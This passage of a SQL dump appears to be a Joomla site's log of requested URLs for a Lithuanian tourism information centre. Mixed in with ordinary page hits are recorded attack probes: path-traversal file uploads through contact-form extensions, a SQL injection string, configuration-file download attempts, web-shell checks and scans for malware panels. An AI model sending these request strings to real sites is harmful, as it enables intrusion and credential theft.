12:15:24','0000-00-00 00:00:00'),(2339,'http://www.infotytuvenai.lt/index.php/lt/details-menu/23-college-of-communication','','','',44,0,'2018-06-14 14:41:32','0000-00-00 00:00:00'),(2340,'http://www.infotytuvenai.lt/index.php/lt/details-menu/22-college-of-arts-sciences','','','',56,0,'2018-06-14 22:23:37','0000-00-00 00:00:00'),(2341,'http://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','','',102,0,'2018-06-15 04:32:38','0000-00-00 00:00:00'),(2342,'http://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai','','','',72,0,'2018-06-15 04:32:46','0000-00-00 00:00:00'),(2343,'http://infotytuvenai.lt/index.php/lt/apgyvendinimas/kaimo-turizmas','','','',284,0,'2018-06-15 04:33:34','0000-00-00 00:00:00'),(2344,'http://infotytuvenai.lt/index.php/lt/xmlrpc.php','','http://infotytuvenai.lt/index.php/lt/xmlrpc.php','',1,0,'2018-06-15 05:51:58','0000-00-00 00:00:00'),(2345,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/31-renginiai','','','',119,0,'2018-06-15 13:52:52','0000-00-00 00:00:00'),(2346,'http://www.infotytuvenai.lt/index.php/lt/kontaktai/1','','','',13,0,'2018-06-15 18:20:58','0000-00-00 00:00:00'),(2347,'http://www.infotytuvenai.lt/index.php/lt/apgyvendinimas/apgyvendinimas','','','',105,0,'2018-06-15 20:03:03','0000-00-00 00:00:00'),(2348,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/56-tytuvenu-festivalis/naujienos/243-blank','','','',21,0,'2018-06-16 02:07:41','0000-00-00 00:00:00'),(2349,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/?start=12','','','',3,0,'2018-06-16 12:04:22','0000-00-00 00:00:00'),(2350,'http://infotytuvenai.lt/index.php/lt/apgyvendinimas/apgyvendinimas','','','',228,0,'2018-06-18 00:14:55','0000-00-00 00:00:00'),(2351,'http://infotytuvenai.lt/index.php/lt/component/content/category/2-uncategorised','','','',55,0,'2018-06-18 00:18:34','0000-00-00 00:00:00'),(2352,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/2-uncategorised','','','',9,0,'2018-06-18 00:25:08','0000-00-00 00:00:00'),(2353,'http://infotytuvenai.lt/index.php/lt/details-menu/23-college-of-communication','','','',30,0,'2018-06-18 07:31:30','0000-00-00 00:00:00'),(2354,'http://infotytuvenai.lt/index.php/lt/details-menu/24-college-of-engineering','','','',26,0,'2018-06-18 07:31:32','0000-00-00 00:00:00'),(2355,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../../rxr.php','','','',1,0,'2018-06-19 19:27:32','0000-00-00 00:00:00'),(2356,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/?start=60','','','',2,0,'2018-06-19 20:46:49','0000-00-00 00:00:00'),(2357,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/','','','',20,0,'2018-06-19 23:55:14','0000-00-00 00:00:00'),(2358,'http://infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/188-gamtos-paminklai','','','',29,0,'2018-06-21 06:27:36','0000-00-00 00:00:00'),(2359,'http://infotytuvenai.lt/index.php/lt/details-menu','','','',37,0,'2018-06-21 06:59:21','0000-00-00 00:00:00'),(2360,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos&amp','','','',2,0,'2018-06-21 07:01:21','0000-00-00 00:00:00'),(2361,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos&nbsp','','','',1,0,'2018-06-21 07:01:22','0000-00-00 00:00:00'),(2362,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/188-gamtos-paminklai','','','',9,0,'2018-06-21 09:06:27','0000-00-00 00:00:00'),(2363,'http://infotytuvenai.lt/index.php/lt/component/content/category/9-sample-data-article','','','',11,0,'2018-06-21 10:47:00','0000-00-00 00:00:00'),(2364,'http://www.infotytuvenai.lt/index.php/lt/images/meniu-page-004.jpg','','','',1,0,'2018-06-21 13:36:14','0000-00-00 00:00:00'),(2365,'http://www.infotytuvenai.lt/index.php/lt/images/meniu-page-002.jpg','','','',1,0,'2018-06-21 16:56:15','0000-00-00 00:00:00'),(2366,'http://infotytuvenai.lt/index.php/lt/details-menu/22-college-of-arts-sciences','','','',32,0,'2018-06-21 21:12:41','0000-00-00 00:00:00'),(2367,'http://infotytuvenai.lt/index.php/lt/details-menu/26-college-of-general-studies','','','',30,0,'2018-06-22 04:30:14','0000-00-00 00:00:00'),(2368,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/56-tytuvenu-festivalis/naujienos/243-blank','','','',11,0,'2018-06-22 12:02:16','0000-00-00 00:00:00'),(2369,'http://www.infotytuvenai.lt/index.php/lt/images/meniu-page-001.jpg','','','',1,0,'2018-06-22 16:41:45','0000-00-00 00:00:00'),(2370,'http://www.infotytuvenai.lt/index.php/lt/images/meniu-page-003.jpg','','','',1,0,'2018-06-22 20:10:14','0000-00-00 00:00:00'),(2371,'http://infotytuvenai.lt/index.php/lt/component/content/category/undefined/','','','',7,0,'2018-06-23 13:00:16','0000-00-00 00:00:00'),(2372,'http://infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/77-laboratory','','','',20,0,'2018-06-26 03:23:11','0000-00-00 00:00:00'),(2373,'http://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/243-blank','','','',19,0,'2018-06-26 03:24:20','0000-00-00 00:00:00'),(2374,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',5,0,'2018-06-26 14:34:06','0000-00-00 00:00:00'),(2375,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',5,0,'2018-06-27 04:00:45','0000-00-00 00:00:00'),(2376,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/meniu-page-002.jpg','','','',2,0,'2018-06-27 17:48:10','0000-00-00 00:00:00'),(2377,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',5,0,'2018-06-27 23:54:06','0000-00-00 00:00:00'),(2378,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/meniu-page-003.jpg','','','',2,0,'2018-06-28 05:04:17','0000-00-00 00:00:00'),(2379,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/meniu-page-001.jpg','','','',2,0,'2018-06-28 13:08:02','0000-00-00 00:00:00'),(2380,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/meniu-page-004.jpg','','','',2,0,'2018-06-28 14:38:48','0000-00-00 00:00:00'),(2381,'http://infotytuvenai.lt/index.php/lt/details-menu/25-college-of-fine-arts','','','',27,0,'2018-06-30 02:25:34','0000-00-00 00:00:00'),(2382,'http://infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/185-galerija','','','',23,0,'2018-06-30 03:36:35','0000-00-00 00:00:00'),(2383,'http://infotytuvenai.lt/index.php/lt/component/content/article/56-tytuvenu-festivalis/naujienos/243-blank','','','',32,0,'2018-06-30 03:39:52','0000-00-00 00:00:00'),(2384,'http://infotytuvenai.lt/index.php/lt/details-menu/27-college-of-health-rehabilitation-sciences-sargent-college','','','',30,0,'2018-06-30 03:41:35','0000-00-00 00:00:00'),(2385,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/243-blank','','','',41,0,'2018-06-30 19:10:17','0000-00-00 00:00:00'),(2386,'http://infotytuvenai.lt/index.php/lt/BrPJaZb5VtPHL/sakl3t78LVxZ6/KqAc8Invts6Dy92W/1t9ZVbyB80KMId4ePk9z/Vi4FYnWQUR8ZA','','','',1,0,'2018-07-01 04:44:13','0000-00-00 00:00:00'),(2387,'http://infotytuvenai.lt/index.php/lt/favicon.ico','','','',13,0,'2018-07-01 04:44:21','0000-00-00 00:00:00'),(2388,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',26,0,'2018-07-04 05:02:47','0000-00-00 00:00:00'),(2389,'http://infotytuvenai.lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php','','','',9,0,'2018-07-04 05:02:59','0000-00-00 00:00:00'),(2390,'http://infotytuvenai.lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php','','','',9,0,'2018-07-04 05:02:59','0000-00-00 00:00:00'),(2391,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/login.php','','','',11,0,'2018-07-04 13:52:56','0000-00-00 00:00:00'),(2392,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/theme/style.css','','','',2,0,'2018-07-04 13:52:58','0000-00-00 00:00:00'),(2393,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/admin.php','','','',4,0,'2018-07-04 13:52:59','0000-00-00 00:00:00'),(2394,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/config.php','','','',5,0,'2018-07-04 13:53:03','0000-00-00 00:00:00'),(2395,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/post.php','','','',3,0,'2018-07-04 13:53:04','0000-00-00 00:00:00'),(2396,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/index.html','','','',2,0,'2018-07-04 13:53:04','0000-00-00 00:00:00'),(2397,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/graphics/banner.png','','','',1,0,'2018-07-04 13:53:04','0000-00-00 00:00:00'),(2398,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/login.php?op=login','','','',1,0,'2018-07-04 13:53:06','0000-00-00 00:00:00'),(2399,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/project.php','','','',1,0,'2018-07-04 13:53:06','0000-00-00 00:00:00'),(2400,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/android/admin.php','','','',1,0,'2018-07-04 13:53:08','0000-00-00 00:00:00'),(2401,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/cron.php','','','',1,0,'2018-07-04 13:53:12','0000-00-00 00:00:00'),(2402,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/logout.php','','','',2,0,'2018-07-04 13:53:12','0000-00-00 00:00:00'),(2403,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tasks.php','','','',2,0,'2018-07-04 13:53:12','0000-00-00 00:00:00'),(2404,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/stats.php','','','',1,0,'2018-07-04 13:53:12','0000-00-00 00:00:00'),(2405,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/run.php','','','',1,0,'2018-07-04 13:53:13','0000-00-00 00:00:00'),(2406,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/asdfddsas.php','','','',1,0,'2018-07-04 13:53:13','0000-00-00 00:00:00'),(2407,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/theme/header.html','','','',2,0,'2018-07-04 13:53:14','0000-00-00 00:00:00'),(2408,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/cp.php','','','',1,0,'2018-07-04 13:53:14','0000-00-00 00:00:00'),(2409,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/theme/images/back-all.jpg','','','',1,0,'2018-07-04 13:53:14','0000-00-00 00:00:00'),(2410,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tmp','','','',1,0,'2018-07-04 13:53:15','0000-00-00 00:00:00'),(2411,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tmp/','','','',1,0,'2018-07-04 13:53:15','0000-00-00 00:00:00'),(2412,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/vendor','','','',1,0,'2018-07-04 13:53:15','0000-00-00 00:00:00'),(2413,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/vendor/','','','',1,0,'2018-07-04 13:53:16','0000-00-00 00:00:00'),(2414,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/lib','','','',1,0,'2018-07-04 13:53:16','0000-00-00 00:00:00'),(2415,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/lib/','','','',1,0,'2018-07-04 13:53:16','0000-00-00 00:00:00'),(2416,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/app','','','',1,0,'2018-07-04 13:53:17','0000-00-00 00:00:00'),(2417,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/app/','','','',1,0,'2018-07-04 13:53:17','0000-00-00 00:00:00'),(2418,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tmp/logs','','','',1,0,'2018-07-04 13:53:17','0000-00-00 00:00:00'),(2419,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/tmp/logs/','','','',1,0,'2018-07-04 13:53:17','0000-00-00 00:00:00'),(2420,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/uploads','','','',1,0,'2018-07-04 13:53:18','0000-00-00 00:00:00'),(2421,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/uploads/','','','',1,0,'2018-07-04 13:53:18','0000-00-00 00:00:00'),(2422,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/public','','','',1,0,'2018-07-04 13:53:18','0000-00-00 00:00:00'),(2423,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/public/','','','',1,0,'2018-07-04 13:53:19','0000-00-00 00:00:00'),(2424,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/logo.png','','','',3,0,'2018-07-04 13:53:21','0000-00-00 00:00:00'),(2425,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/api.php','','','',1,0,'2018-07-04 13:53:27','0000-00-00 00:00:00'),(2426,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/data/login.css','','','',1,0,'2018-07-04 13:53:27','0000-00-00 00:00:00'),(2427,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/back.css','','','',1,0,'2018-07-04 13:53:31','0000-00-00 00:00:00'),(2428,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/asfdsfafggdf.php','','','',1,0,'2018-07-04 13:53:33','0000-00-00 00:00:00'),(2429,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/e.php','','','',1,0,'2018-07-04 13:53:33','0000-00-00 00:00:00'),(2430,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/images/','','','',1,0,'2018-07-04 13:53:34','0000-00-00 00:00:00'),(2431,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis/tt0002/MOLLYSLAPTOP_W617601.B10DE07AAF4822AB78BF9FC6CB51E4D4/0/Windows 7 x64 SP1/1013/197.58.23.172/1B11ABA3CDC04496695F64E9DB6DC83C2CD8B8821DD86FCEF948BBE27F4D8158/etd1eu5qKefqp','','','',1,0,'2018-07-04 13:53:36','0000-00-00 00:00:00'),(2432,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/main.php','','','',1,0,'2018-07-04 13:53:39','0000-00-00 00:00:00'),(2433,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/submit.php','','','',1,0,'2018-07-04 13:53:39','0000-00-00 00:00:00'),(2434,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/style.css','','','',1,0,'2018-07-04 13:53:41','0000-00-00 00:00:00'),(2435,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/design/images/favicon.ico','','','',1,0,'2018-07-04 13:53:41','0000-00-00 00:00:00'),(2436,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/assets/img/favicon.ico','','','',1,0,'2018-07-04 13:53:43','0000-00-00 00:00:00'),(2437,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/fre.php','','','',1,0,'2018-07-04 13:53:52','0000-00-00 00:00:00'),(2438,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/css','','','',2,0,'2018-07-04 13:53:56','0000-00-00 00:00:00'),(2439,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/files','','','',1,0,'2018-07-04 13:53:56','0000-00-00 00:00:00'),(2440,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/back','','','',1,0,'2018-07-04 13:53:56','0000-00-00 00:00:00'),(2441,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/flags','','','',1,0,'2018-07-04 13:53:57','0000-00-00 00:00:00'),(2442,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/softs','','','',1,0,'2018-07-04 13:53:57','0000-00-00 00:00:00'),(2443,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/home.php','','','',1,0,'2018-07-04 13:53:57','0000-00-00 00:00:00'),(2444,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/images/favicon.ico','','','',1,0,'2018-07-04 13:54:01','0000-00-00 00:00:00'),(2445,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/ufr.php','','','',1,0,'2018-07-04 13:54:04','0000-00-00 00:00:00'),(2446,'http://www.infotytuvenai.lt/index.php/lt/login.php','','','',1,0,'2018-07-04 13:54:05','0000-00-00 00:00:00'),(2447,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img','','','',3,0,'2018-07-04 13:54:12','0000-00-00 00:00:00'),(2448,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/banners','','','',2,0,'2018-07-04 13:54:13','0000-00-00 00:00:00'),(2449,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/gate.php','','','',2,0,'2018-07-04 13:54:15','0000-00-00 00:00:00'),(2450,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/','','','',1,0,'2018-07-04 13:54:15','0000-00-00 00:00:00'),(2451,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes','','','',1,0,'2018-07-04 13:54:15','0000-00-00 00:00:00'),(2452,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/','','','',1,0,'2018-07-04 13:54:16','0000-00-00 00:00:00'),(2453,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/statistics.php','','','',1,0,'2018-07-04 13:54:16','0000-00-00 00:00:00'),(2454,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/statistics.php/','','','',1,0,'2018-07-04 13:54:16','0000-00-00 00:00:00'),(2455,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/database.php','','','',1,0,'2018-07-04 13:54:16','0000-00-00 00:00:00'),(2456,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/database.php/','','','',1,0,'2018-07-04 13:54:17','0000-00-00 00:00:00'),(2457,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/gate.php/','','','',1,0,'2018-07-04 13:54:18','0000-00-00 00:00:00'),(2458,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/commands.php','','','',1,0,'2018-07-04 13:54:18','0000-00-00 00:00:00'),(2459,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/includes/commands.php/','','','',1,0,'2018-07-04 13:54:18','0000-00-00 00:00:00'),(2460,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/css/','','','',1,0,'2018-07-04 13:54:19','0000-00-00 00:00:00'),(2461,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/css/table_view.css','','','',1,0,'2018-07-04 13:54:19','0000-00-00 00:00:00'),(2462,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/header_logo.png','','','',1,0,'2018-07-04 13:54:20','0000-00-00 00:00:00'),(2463,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/21421asdfdsf.php','','','',2,0,'2018-07-04 13:54:21','0000-00-00 00:00:00'),(2464,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/webcams.php','','','',1,0,'2018-07-04 13:54:22','0000-00-00 00:00:00'),(2465,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/deleteall.php','','','',1,0,'2018-07-04 13:54:22','0000-00-00 00:00:00'),(2466,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/delete.php','','','',1,0,'2018-07-04 13:54:22','0000-00-00 00:00:00'),(2467,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/passwords.php','','','',1,0,'2018-07-04 13:54:23','0000-00-00 00:00:00'),(2468,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/keystrokes.php','','','',1,0,'2018-07-04 13:54:23','0000-00-00 00:00:00'),(2469,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/create.php','','','',2,0,'2018-07-04 13:54:24','0000-00-00 00:00:00'),(2470,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/language.php','','','',1,0,'2018-07-04 13:54:24','0000-00-00 00:00:00'),(2471,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/agent-dark-logo.png','','','',1,0,'2018-07-04 13:54:25','0000-00-00 00:00:00'),(2472,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/typo-dark.png','','','',1,0,'2018-07-04 13:54:26','0000-00-00 00:00:00'),(2473,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/typo.png','','','',1,0,'2018-07-04 13:54:26','0000-00-00 00:00:00'),(2474,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/img/user.png','','','',1,0,'2018-07-04 13:54:27','0000-00-00 00:00:00'),(2475,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/admin/resources/images/','','','',2,0,'2018-07-04 13:54:28','0000-00-00 00:00:00'),(2476,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/admin/resources/css/','','','',2,0,'2018-07-04 13:54:29','0000-00-00 00:00:00'),(2477,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/admin/flags/','','','',2,0,'2018-07-04 13:54:30','0000-00-00 00:00:00'),(2478,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/admin/images/','','','',2,0,'2018-07-04 13:54:31','0000-00-00 00:00:00'),(2479,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/77-laboratory','','','',9,0,'2018-07-04 19:03:06','0000-00-00 00:00:00'),(2480,'http://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/185-galerija','','','',10,0,'2018-07-07 00:32:01','0000-00-00 00:00:00'),(2481,'http://www.infotytuvenai.lt/index.php/lt/10-sample-data-article/demo/13-article','','','',18,0,'2018-07-07 03:54:11','0000-00-00 00:00:00'),(2482,'http://www.infotytuvenai.lt/index.php/lt/component/content/category/9-sample-data-article','','','',2,0,'2018-07-09 03:30:37','0000-00-00 00:00:00'),(2483,'http://www.infotytuvenai.lt/index.php/lt/details-menu','','','',3,0,'2018-07-09 03:31:16','0000-00-00 00:00:00'),(2484,'http://www.infotytuvenai.lt/index.php/lt/?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from ','','','',1,0,'2018-07-10 04:37:38','0000-00-00 00:00:00'),(2485,'http://www.infotytuvenai.lt/index.php/lt/apie-centra/favicon.ico','','','',1,0,'2018-07-11 21:10:07','0000-00-00 00:00:00'),(2486,'http://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/favicon.ico','','','',1,0,'2018-07-11 21:12:50','0000-00-00 00:00:00'),(2487,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/','','http://www.infotytuvenai.lt/index.php/lt/','',2,0,'2018-07-12 01:11:36','0000-00-00 00:00:00'),(2488,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_foxcontact','','','',1,0,'2018-07-13 11:28:24','0000-00-00 00:00:00'),(2489,'http://infotytuvenai.lt/index.php/lt/components/com_foxcontact/lib/file-uploader.php?cid=1&mid=1&qqfile=/../../git.php','','','',1,0,'2018-07-13 11:28:25','0000-00-00 00:00:00'),(2490,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=1&cid=1&mid=1&qqfile=/../../git.php','','','',1,0,'2018-07-13 11:28:26','0000-00-00 00:00:00'),(2491,'http://infotytuvenai.lt/index.php/lt/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=1&cid=1&mid=1&owner=module&id=1&qqfile=/../../git.php','','','',1,0,'2018-07-13 11:28:27','0000-00-00 00:00:00'),(2492,'http://infotytuvenai.lt/index.php/lt/components/com_foxcontact/lib/uploader.php?cid=1&mid=1&qqfile=/../../git.php','','','',1,0,'2018-07-13 11:28:29','0000-00-00 00:00:00'),(2493,'http://www.infotytuvenai.lt/index.php/lt/index.php/lt/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',2,0,'2018-07-16 23:15:51','0000-00-00 00:00:00'),(2494,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos','','','',2,0,'2018-07-17 13:29:03','0000-00-00 00:00:00'),(2495,'http://infotytuvenai.lt/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw','','','',50,0,'2018-07-19 12:21:24','0000-00-00 00:00:00'),(2496,'http://infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../izoc.php','','','',1,0,'2018-07-19 12:25:53','0000-00-00 00:00:00'),(2497,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',24,0,'2018-07-19 21:51:20','0000-00-00 00:00:00'),(2498,'http://www.infotytuvenai.lt//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=','','','',20,0,'2018-07-19 21:51:21','0000-00-00 00:00:00'),(2499,'http://www.infotytuvenai.lt//index.php?option=com_jdownloads&Itemid=0&view=upload','','','',41,0,'2018-07-19 21:51:23','0000-00-00 00:00:00'),(2500,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php','','','',24,0,'2018-07-19 21:51:24','0000-00-00 00:00:00'),(2501,'http://www.infotytuvenai.lt/index.php/lt/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','','','',23,0,'2018-07-19 21:51:27','0000-00-00 00:00:00'),(2502,'http://www.infotytuvenai.lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',62,0,'2018-07-19 21:51:28','0000-00-00 00:00:00'),(2503,'http://www.infotytuvenai.lt/index.php/lt//connectors/system/phpthumb.php','','','',8,0,'2018-07-20 03:25:18','0000-00-00 00:00:00'),(2504,'http://www.infotytuvenai.lt/index.php/lt//dbs.php','','','',8,0,'2018-07-20 03:25:19','0000-00-00 00:00:00'),(2505,'http://infotytuvenai.lt/index.php/lt/13-sample-data-article/demo/features/components/com_k2/js/k2.js?v2.6.7&sitepath=/','','','',4,0,'2018-07-21 13:06:02','0000-00-00 00:00:00'),(2506,'http://www.infotytuvenai.lt/index.php/lt/13-','','','',15,0,'2018-07-23 02:56:23','0000-00-00 00:00:00'),(2507,'http://infotytuvenai.lt/index.php/lt//connectors/system/phpthumb.php','','','',1,0,'2018-07-23 19:35:19','0000-00-00 00:00:00'),(2508,'http://infotytuvenai.lt/index.php/lt//dbs.php','','','',1,0,'2018-07-23 19:35:19','0000-00-00 00:00:00'),(2509,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/item/13-call-for-2013-kusa-elections-dec-2013','','','',7,0,'2018-07-25 10:43:03','0000-00-00 00:00:00'),(2510,'http://infotytuvenai.lt/index.php/lt//language/en-GB/en-GB.xml','','','',2,0,'2018-07-28 02:43:49','0000-00-00 00:00:00'),(2511,'http://infotytuvenai.lt/index.php/lt//application/configs/application.ini','','','',1,0,'2018-07-28 02:44:06','0000-00-00 00:00:00'),(2512,'http://infotytuvenai.lt/index.php/lt//README.txt','','','',1,0,'2018-07-28 02:44:16','0000-00-00 00:00:00'),(2513,'http://infotytuvenai.lt/index.php/lt//admin/images/cal_date_over.gif','','','',1,0,'2018-07-28 02:44:26','0000-00-00 00:00:00'),(2514,'http://infotytuvenai.lt/index.php/lt//admin/login.php','','','',1,0,'2018-07-28 02:44:35','0000-00-00 00:00:00'),(2515,'http://infotytuvenai.lt/index.php/lt//rxr.php?rxr','','','',1,0,'2018-07-28 02:47:27','0000-00-00 00:00:00'),(2516,'http://infotytuvenai.lt/index.php/lt//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw','','','',1,0,'2018-07-28 02:48:09','0000-00-00 00:00:00'),(2517,'http://infotytuvenai.lt/index.php/lt//vulns.php','','','',1,0,'2018-07-28 02:48:18','0000-00-00 00:00:00'),(2518,'http://infotytuvenai.lt/index.php/lt//images/jdownloads/screenshots/tool/bot.php3.g','','','',1,0,'2018-07-28 02:48:45','0000-00-00 00:00:00'),(2519,'http://infotytuvenai.lt/index.php/lt//images/jdownloads/screenshots/rxrking.php3.g?rxr','','','',1,0,'2018-07-28 02:49:41','0000-00-00 00:00:00'),(2520,'http://infotytuvenai.lt/index.php/lt//components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',2,0,'2018-07-28 